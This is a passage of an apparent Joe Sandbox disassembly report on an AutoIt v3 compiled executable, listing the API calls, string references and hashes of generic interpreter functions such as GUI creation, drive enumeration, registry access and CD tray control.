CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0030347A
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0030348E
SendMessageW.USER32(00000404,00000001,00000000), ref: 0030349F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 003034D4
GetStockObject.GDI32(00000011), ref: 003034DF
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003034EA
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 003034F4

Strings

AutoIt v3, xrefs: 00303355
msctls_progress32, xrefs: 00303470
static, xrefs: 003033AC, 003034CE
DISPLAY, xrefs: 003033B7

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 9c3ee812514a803f608c1cd1190789c5364bcc3ce943fd6ea30ba19238c5cdd7
Instruction ID: 07541c2f008fa312e34357b5368639d3258232cd50fc9e2b8bb30bffad785476
Opcode Fuzzy Hash: 9c3ee812514a803f608c1cd1190789c5364bcc3ce943fd6ea30ba19238c5cdd7
Instruction Fuzzy Hash: EFB14C75A51215AFEB15DFA8CC49FAEBBADEB09710F008514FA15A72E0C774AD40CFA0

Function 002F5524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002F5532
GetDriveTypeW.KERNEL32(?,0031DC30,?,\\.\,0031DCD0), ref: 002F560F
SetErrorMode.KERNEL32(00000000,0031DC30,?,\\.\,0031DCD0), ref: 002F577B

Strings

\\.\, xrefs: 002F5584
Network, xrefs: 002F5647
PhysicalDrive, xrefs: 002F55BB
1394, xrefs: 002F56E4
SATA, xrefs: 002F5715
Removable, xrefs: 002F5655, 002F565A
ATAPI, xrefs: 002F56D6
Virtual, xrefs: 002F572A
MMC, xrefs: 002F5723
FileBackedVirtual, xrefs: 002F5731
SAS, xrefs: 002F570E
SSD, xrefs: 002F568F
CDROM, xrefs: 002F5640
iSCSI, xrefs: 002F5707
ATA, xrefs: 002F56DD
USB, xrefs: 002F56F9
RAID, xrefs: 002F5700
Unknown, xrefs: 002F5632, 002F56C8
SCSI, xrefs: 002F56CF
SSA, xrefs: 002F56EB
Fixed, xrefs: 002F564E
RAMDisk, xrefs: 002F5639
Fibre, xrefs: 002F56F2

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: f2200ec34e213a18f9a19ed92bd9c628450bf7c4167e44bb39fd802b1e5b2ae5
Instruction ID: 2de960b8d6e7ad0b4edcf370ae2b81619fe186609bb55ba1329fe65ee343255c
Opcode Fuzzy Hash: f2200ec34e213a18f9a19ed92bd9c628450bf7c4167e44bb39fd802b1e5b2ae5
Instruction Fuzzy Hash: D661D034AB491EDBC725EF24C9918B9F3E1AF05390B648035E716AF291C771ED21CB81

Function 00282521 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002825F8
GetSystemMetrics.USER32(00000007), ref: 00282600
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0028262B
GetSystemMetrics.USER32(00000008), ref: 00282633
GetSystemMetrics.USER32(00000004), ref: 00282658
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00282675
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00282685
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 002826B8
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 002826CC
GetClientRect.USER32(00000000,000000FF), ref: 002826EA
GetStockObject.GDI32(00000011), ref: 00282706
SendMessageW.USER32(00000000,00000030,00000000), ref: 00282711

Part of subcall function 002819CD: GetCursorPos.USER32(?), ref: 002819E1
Part of subcall function 002819CD: ScreenToClient.USER32(00000000,?), ref: 002819FE
Part of subcall function 002819CD: GetAsyncKeyState.USER32(00000001), ref: 00281A23
Part of subcall function 002819CD: GetAsyncKeyState.USER32(00000002), ref: 00281A3D

SetTimer.USER32(00000000,00000000,00000028,0028199C), ref: 00282738

Strings

(5, xrefs: 00282749
(5, xrefs: 002C3909
<)5, xrefs: 002C39A6
(5, xrefs: 0028271A
AutoIt v3 GUI, xrefs: 002826B0
<)5, xrefs: 0028255C

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: <)5$<)5$AutoIt v3 GUI$(5$(5$(5
API String ID: 1458621304-1065348010
Opcode ID: 63fbb7915fc09c40fd3dba7aa210e1e9e6959c5af7c3a2901f765596ff64abfa
Instruction ID: da2f4371b255e3c6e9f1a82c2e47b54c44a1a52273be036adde07b6cda82d9e7
Opcode Fuzzy Hash: 63fbb7915fc09c40fd3dba7aa210e1e9e6959c5af7c3a2901f765596ff64abfa
Instruction Fuzzy Hash: 0BB17975A1120ADFDB15DFA8CC45FEA7BA9FB49314F108229FA05A72E0D774A820CB50

Function 00311A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00311BC4
GetDesktopWindow.USER32 ref: 00311BD9
GetWindowRect.USER32(00000000), ref: 00311BE0
GetWindowLongW.USER32(?,000000F0), ref: 00311C35
DestroyWindow.USER32(?), ref: 00311C55
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00311C89
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00311CA7
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00311CB9
SendMessageW.USER32(00000000,00000421,?,?), ref: 00311CCE
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00311CE1
IsWindowVisible.USER32(00000000), ref: 00311D3D
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00311D58
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00311D6C
GetWindowRect.USER32(00000000,?), ref: 00311D84
MonitorFromPoint.USER32(?,?,00000002), ref: 00311DAA
GetMonitorInfoW.USER32(00000000,?), ref: 00311DC4
CopyRect.USER32(?,?), ref: 00311DDB
SendMessageW.USER32(00000000,00000412,00000000), ref: 00311E46

Strings

tooltips_class32, xrefs: 00311C82
(, xrefs: 00311DB7
0, xrefs: 00311B6F

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: b3c1a2265a8a54565fb37e020babb4718629a8ab49705308225fdcffdae81938
Instruction ID: 8b47b6674ee61d98e2fbd983b858ad93876fa7041aeb1e5554f92e6bd3a51362
Opcode Fuzzy Hash: b3c1a2265a8a54565fb37e020babb4718629a8ab49705308225fdcffdae81938
Instruction Fuzzy Hash: 96B18E71618301AFD715DF64C984BAAFBE9FF89310F00891CF5999B2A1D731D854CBA2

Function 00310CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00310D81
_wcslen.LIBCMT ref: 00310DBB
_wcslen.LIBCMT ref: 00310E25
_wcslen.LIBCMT ref: 00310E8D
_wcslen.LIBCMT ref: 00310F11
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00310F61
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00310FA0

Part of subcall function 0029FD52: _wcslen.LIBCMT ref: 0029FD5D

Part of subcall function 002E2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002E2BA5
Part of subcall function 002E2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002E2BD7

Strings

SELECTALL, xrefs: 00310FB1
ISSELECTED, xrefs: 00310F79
GETITEMCOUNT, xrefs: 00310DB2, 00310DD3
FINDITEM, xrefs: 003110C3
GETSELECTEDCOUNT, xrefs: 00310F0C, 00310F27
GETSUBITEMCOUNT, xrefs: 00310E20, 00310E3B
SELECT, xrefs: 00310FE4
GETTEXT, xrefs: 00310E88, 00310EA3
SELECTCLEAR, xrefs: 00310FC9
DESELECT, xrefs: 00311038
VIEWCHANGE, xrefs: 00311111
SELECTINVERT, xrefs: 0031101A
GETSELECTED, xrefs: 0031107D

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 0ea5ee86b2655492ac30701334752cb5687d2ffab55c1f6850e1e7e62923c79c
Instruction ID: e058950b349ef35a717833c26cc1d972e5f275de0bac2ab9885d508d4c762540
Opcode Fuzzy Hash: 0ea5ee86b2655492ac30701334752cb5687d2ffab55c1f6850e1e7e62923c79c
Instruction Fuzzy Hash: 72E1F0352183418FCB1AEF24C9518AAB3E6FF8D314B11496CF4969B7A1DB30ED85CB91

Function 002E16D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002E1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002E1A60
Part of subcall function 002E1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,002E14E7,?,?,?), ref: 002E1A6C
Part of subcall function 002E1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002E14E7,?,?,?), ref: 002E1A7B
Part of subcall function 002E1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002E14E7,?,?,?), ref: 002E1A82
Part of subcall function 002E1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002E1A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002E1741
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002E1775
GetLengthSid.ADVAPI32(?), ref: 002E178C
GetAce.ADVAPI32(?,00000000,?), ref: 002E17C6
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002E17E2
GetLengthSid.ADVAPI32(?), ref: 002E17F9
GetProcessHeap.KERNEL32(00000008,00000008), ref: 002E1801
HeapAlloc.KERNEL32(00000000), ref: 002E1808
GetLengthSid.ADVAPI32(?,00000008,?), ref: 002E1829
CopySid.ADVAPI32(00000000), ref: 002E1830
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002E185F
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002E1881
SetUserObjectSecurity.USER32(?,00000004,?), ref: 002E1893
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002E18BA
HeapFree.KERNEL32(00000000), ref: 002E18C1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002E18CA
HeapFree.KERNEL32(00000000), ref: 002E18D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002E18DA
HeapFree.KERNEL32(00000000), ref: 002E18E1
GetProcessHeap.KERNEL32(00000000,?), ref: 002E18ED
HeapFree.KERNEL32(00000000), ref: 002E18F4

Part of subcall function 002E1ADF: GetProcessHeap.KERNEL32(00000008,002E14FD,?,00000000,?,002E14FD,?), ref: 002E1AED
Part of subcall function 002E1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,002E14FD,?), ref: 002E1AF4
Part of subcall function 002E1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,002E14FD,?), ref: 002E1B03

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 1932342c3008470ba0c0b906edd61338df475c9d6d09b773102a5319fc867f1c
Instruction ID: a2031b2b5f37440441f9bcfbdc5b92fe76b654ab7a7d54767d20ffcc8084c6c1
Opcode Fuzzy Hash: 1932342c3008470ba0c0b906edd61338df475c9d6d09b773102a5319fc867f1c
Instruction Fuzzy Hash: 69716BB2D5024AAFEF11DFA6DC44FEEBBBCBF09700F548125E915A6190D7309A25CB60

Function 0030CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0030CF1D
RegCreateKeyExW.ADVAPI32(?,?,00000000,0031DCD0,00000000,?,00000000,?,?), ref: 0030CFA4
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0030D004
_wcslen.LIBCMT ref: 0030D054
_wcslen.LIBCMT ref: 0030D0CF
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0030D112
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0030D221
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0030D2AD
RegCloseKey.ADVAPI32(?), ref: 0030D2E1
RegCloseKey.ADVAPI32(00000000), ref: 0030D2EE
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0030D3C0

Strings

REG_DWORD, xrefs: 0030D264
REG_BINARY, xrefs: 0030D373
REG_QWORD, xrefs: 0030D323
REG_SZ, xrefs: 0030D0A4
REG_EXPAND_SZ, xrefs: 0030D02D
REG_MULTI_SZ, xrefs: 0030D155

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: bebd0cb1a5ce78d392d2490948931590cfa67c8816e136f23675ec53bda676d6
Instruction ID: 5e4d770b705b5c743a801aba6a4b7ceef23eafb3d66234f86285140e0994ec9f
Opcode Fuzzy Hash: bebd0cb1a5ce78d392d2490948931590cfa67c8816e136f23675ec53bda676d6
Instruction Fuzzy Hash: DC128B356152019FDB16EF14C891A2AB7E6FF88714F05889CF94A9B3A2CB31EC51CF81

Function 003113BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00311462
_wcslen.LIBCMT ref: 0031149D
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003114F0
_wcslen.LIBCMT ref: 00311526
_wcslen.LIBCMT ref: 003115A2
_wcslen.LIBCMT ref: 0031161D

Part of subcall function 0029FD52: _wcslen.LIBCMT ref: 0029FD5D

Part of subcall function 002E3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002E3547

Strings

GETTEXT, xrefs: 00311733
GETITEMCOUNT, xrefs: 003116BA
ISCHECKED, xrefs: 0031177D
GETTOTALCOUNT, xrefs: 0031148E, 003114B3
CHECK, xrefs: 00311521, 0031153C
UNCHECK, xrefs: 003117DA
COLLAPSE, xrefs: 0031159D, 003115B8
SELECT, xrefs: 003117AD
EXPAND, xrefs: 00311694
GETSELECTED, xrefs: 003116EA
EXISTS, xrefs: 00311618, 00311633

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 273bbdf458c65b7e064b37661aab2979f603ceda89fd1def9d05f2e383836e65
Instruction ID: dea734c8ad7bd424b185fd46bd2e697c32dc01b38360ba62b6fb9c1bf8f208bf
Opcode Fuzzy Hash: 273bbdf458c65b7e064b37661aab2979f603ceda89fd1def9d05f2e383836e65
Instruction Fuzzy Hash: 1AE1F1356143018FCB0AEF25C4508AAB7E6FF99310B45885CF9969B7A2DB30ED95CF81

Function 0030D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0030C10E,?,?), ref: 0030D415
_wcslen.LIBCMT ref: 0030D451
_wcslen.LIBCMT ref: 0030D4C8
_wcslen.LIBCMT ref: 0030D4FE
_wcslen.LIBCMT ref: 0030D559
_wcslen.LIBCMT ref: 0030D58F
_wcslen.LIBCMT ref: 0030D5DF

Strings

HKCU, xrefs: 0030D62E
HKEY_USERS, xrefs: 0030D63F
HKLM, xrefs: 0030D4F8, 0030D4FD
HKEY_CURRENT_CONFIG, xrefs: 0030D5D9, 0030D5DE
HKEY_CLASSES_ROOT, xrefs: 0030D553, 0030D558
HKU, xrefs: 0030D650
HKEY_LOCAL_MACHINE, xrefs: 0030D4C2, 0030D4C7
HKCC, xrefs: 0030D60C
HKEY_CURRENT_USER, xrefs: 0030D61D
HKCR, xrefs: 0030D589, 0030D58E

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 99bef1dadc9941cd645ee02c363ec3a40f1ca59d14503ae3ee0ce84ad1ba6ab6
Instruction ID: 17f030e7f801733931d51fed9fa9839d4da56e621aae4648575b12713df6da0a
Opcode Fuzzy Hash: 99bef1dadc9941cd645ee02c363ec3a40f1ca59d14503ae3ee0ce84ad1ba6ab6
Instruction Fuzzy Hash: 1971063261212A8BCB12AFBCCD205BF37D5AF62368B620124FC559B2D4EB35DD54C7A0

Function 00318D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00318DB5
_wcslen.LIBCMT ref: 00318DC9
_wcslen.LIBCMT ref: 00318DEC
_wcslen.LIBCMT ref: 00318E0F
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00318E4D
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00316691), ref: 00318EA9
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00318EE2
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00318F25
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00318F5C
FreeLibrary.KERNEL32(?), ref: 00318F68
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00318F78
DestroyIcon.USER32(?,?,?,?,?,00316691), ref: 00318F87
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00318FA4
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00318FB0

Strings

.icl, xrefs: 00318DC3
.exe, xrefs: 00318DE3
.dll, xrefs: 00318E06

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: ed56934a377d818f2baa1b37052aa6c0b96608fee5799c5943da4d6bb1f53a3a
Instruction ID: 3f24a61260d8086c87f0ab85dc8800ad366773b605fbc83c7ef5451731594371
Opcode Fuzzy Hash: ed56934a377d818f2baa1b37052aa6c0b96608fee5799c5943da4d6bb1f53a3a
Instruction Fuzzy Hash: 0261EE71910214BAEB1ADF64DC41BFE77ADAF09B20F108506F815E61D1DFB4A991CBA0

Function 002F48BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 002F493D
_wcslen.LIBCMT ref: 002F4948
_wcslen.LIBCMT ref: 002F499F
_wcslen.LIBCMT ref: 002F49DD
GetDriveTypeW.KERNEL32(?), ref: 002F4A1B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002F4A63
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002F4A9E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002F4ACC

Strings

type cdaudio alias cd wait, xrefs: 002F4A46
closed, xrefs: 002F494D, 002F4972, 002F498B, 002F49C3, 002F49DC
open , xrefs: 002F4A2A
close cd wait, xrefs: 002F4AB7
wait, xrefs: 002F4A89
set cd door , xrefs: 002F4A6D
open, xrefs: 002F4999, 002F499E
close, xrefs: 002F4943, 002F495D

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 43845b51645deab391ca077126c57accc9cc9a43c2ae39b3bfca6b9006c1ccaf
Instruction ID: e992138614bdbb176cd0300eb6741a924220e89e904d5151ad6d18b3c42a098c
Opcode Fuzzy Hash: 43845b51645deab391ca077126c57accc9cc9a43c2ae39b3bfca6b9006c1ccaf
Instruction Fuzzy Hash: A571F5366242068FC710FF24C88097BB7E4EF94798F40492DF99597291EB70ED55CB91

Function 002E6382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 002E6395
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002E63A7
